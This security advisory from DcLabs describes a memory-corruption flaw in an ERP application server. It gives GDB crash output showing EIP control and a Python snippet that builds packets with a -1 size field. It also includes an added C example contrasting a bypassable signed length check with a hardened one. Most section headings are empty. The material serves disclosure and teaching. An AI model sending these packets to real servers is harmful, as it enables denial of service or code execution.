[DCA-2011-0010]
[Discussion]
[Software]
[Vendor Product Description]
[Advisory Timeline]
[Bug Summary]
[Impact]
[Affected Version]
[Bug Description and Proof of Concept]
— GDB OUTPUT BEGIN —
Attaching to process 12748
Reading symbols from /microsiga/protheus10/bin/appserver/totvssrvlinux...(no debugging symbols found)...done.
— snippet output —
warning: Lowest section in system-supplied DSO at 0xffffe000 is .hash at ffffe0b4
0xffffe410 in __kernel_vsyscall ()
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 4117961632 (LWP 12775)]
0x6b035205 in ?? ()
(gdb) bt
#0 0x6b035205 in ?? ()
#1 0x080917ed in pthread_equal ()
#2 0x08bd7389 in ?? ()
#3 0x08c04398 in ?? ()
#4 0x08ba2c21 in ?? ()
#5 0x08ba3a88 in ?? ()
#6 0x08ba3c1f in ?? ()
#7 0x08bcda16 in ?? ()
#8 0x08091c4b in pthread_equal ()
#9 0x08b85239 in ?? ()
#10 0x08b856d6 in ?? ()
#11 0xf7ef22ab in start_thread () from /lib/libpthread.so.0
#12 0xf7e59dbe in clone () from /lib/libc.so.6
(gdb) x/10i $eip
0x6b035205: Cannot access memory at address 0x6b035205
(gdb) i r
eax 0xbee7780 200177536
ecx 0x2 2
edx 0x1 1
ebx 0xf57306d0 -177010992
esp 0xf57306ac 0xf57306ac
ebp 0xf5730708 0xf5730708
esi 0xf57306d8 -177010984
edi 0x6315 25365
eip 0x6b035205 0x6b035205
eflags 0x10283 [ CF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) quit
— GDB OUTPUT END —
We clearly overwrote the EIP register: it now points to 0x6b035205, an address GDB cannot even read (see the failed x/10i $eip), so execution was redirected to a nonsense location rather than merely faulting on a bad data access.
Here is a snippet of the Python exploit:
— CODE SNIPPET BEGIN —
if options.target == 8:
    version = "20081215030344"
else:
    version = "20100812040605"
packet_handshake = (
    "%14s"
    "\x00\x01"
    "%36s\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "%32s\x00"
    "%s\x00"
    "\x00\x00\x14\x01"
) % ("A"*14, "B"*36, "C"*32, version)
packet_environ = (
    "\x42\x00\x00\x00\x21\xab\x42\x00\x00\x00"
    "\xff\xff\xff\xff" # Memory Corruption (-1 as size)
    "\x01\x00\x3e\x82\x01\x03\x02\x04\x00\x00"
    "\x00\x00%7s\x00\x00\x00\x00\x00\x00"
    "%11s\x00\x00\x00\x00\x00\x00"
    "\x01\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00"
) % ("D"*7, "E"*11)
— CODE SNIPPET END —
— GDB OUTPUT BEGIN —
(gdb) print /d (int)0x00000038
$4 = 56
(gdb) print /d (unsigned int)0x00000038
$5 = 56
(gdb) print /d (int)0xffffffff
$6 = -1
(gdb) print /d (unsigned int)0xffffffff
$7 = 4294967295
— GDB OUTPUT END —
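The four print /d lines above are the whole point behind the "\xff\xff\xff\xff" size field in the snippet: read into a signed int the value is -1 and slips under any "too large" comparison, but the same bits handed to a copy routine are 4294967295. The C program below is an added illustration, not code from this advisory or from the vendor; the field layout (a little-endian 32-bit length followed by payload bytes) and the MAX_FIELD limit are assumptions constructed for the example. It places the weak signed check next to a hardened unsigned one that also bounds the length by the bytes actually received, which is the second failure mode a length field can trigger.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_FIELD 64   /* assumed application limit for the field (int on purpose, see below) */

typedef enum { REJECTED = 0, ACCEPTED = 1 } verdict_t;

/* Decode a little-endian 32-bit length. The exploit writes the size as raw
   bytes, so ff ff ff ff arrives as 0xffffffff. */
static uint32_t rd_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Weak pattern: the length lives in a signed int. 0xffffffff becomes -1
   (gdb's "$6 = -1"), the "too large" comparison passes, and the value is
   then widened to size_t for the copy, where it is SIZE_MAX
   (4294967295 on the 32-bit target, gdb's "$7"). */
verdict_t check_size_signed(const unsigned char *pkt, size_t pktlen, size_t *copylen) {
    if (pktlen < 4) return REJECTED;
    int len = (int)rd_le32(pkt);            /* -1 for ff ff ff ff (two's complement) */
    if (len > MAX_FIELD) return REJECTED;   /* -1 > 64 is false: the check is bypassed */
    *copylen = (size_t)len;                 /* what memcpy(out, pkt + 4, len) would receive */
    return ACCEPTED;
}

/* Hardened pattern: keep the length unsigned, bound it by the destination
   buffer, and bound it by the bytes actually present in the packet. */
verdict_t check_size_unsigned(const unsigned char *pkt, size_t pktlen, size_t *copylen) {
    if (pktlen < 4) return REJECTED;
    uint32_t len = rd_le32(pkt);
    if (len > MAX_FIELD) return REJECTED;   /* 4294967295 > 64: rejected */
    if (len > pktlen - 4) return REJECTED;  /* claims more bytes than were received: rejected */
    *copylen = len;
    return ACCEPTED;
}

/* Hardened copy: returns the number of bytes copied, or -1 if the field was rejected. */
int parse_field(const unsigned char *pkt, size_t pktlen, unsigned char out[MAX_FIELD]) {
    size_t n;
    if (check_size_unsigned(pkt, pktlen, &n) != ACCEPTED) return -1;
    memcpy(out, pkt + 4, n);
    return (int)n;
}

int main(void) {
    /* Constructed packets: 4-byte size field followed by payload. */
    const unsigned char evil[] = { 0xff, 0xff, 0xff, 0xff, 'D', 'D', 'D' };
    const unsigned char sane[] = { 0x07, 0x00, 0x00, 0x00, 'D', 'D', 'D', 'D', 'D', 'D', 'D' };
    unsigned char out[MAX_FIELD];
    size_t n = 0;

    printf("signed check on ff ff ff ff:   %s (copy length %zu)\n",
           check_size_signed(evil, sizeof evil, &n) ? "ACCEPTED" : "REJECTED", n);
    printf("unsigned check on ff ff ff ff: %s\n",
           check_size_unsigned(evil, sizeof evil, &n) ? "ACCEPTED" : "REJECTED");
    printf("hardened parse of sane packet copied %d bytes\n",
           parse_field(sane, sizeof sane, out));
    return 0;
}
```

MAX_FIELD is deliberately a plain int: had it been written as 64u, the signed -1 would have been promoted to unsigned in the comparison and the weak check would have rejected it by accident, which is exactly the kind of fragile behaviour a reviewer should not rely on. The fix is to keep the length unsigned from the moment it is decoded and to check it against both the destination size and the received length.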
All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br
[Solution / Workarounds]
[Credits]
DcLabs Security Research Group.
Best regards,
Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com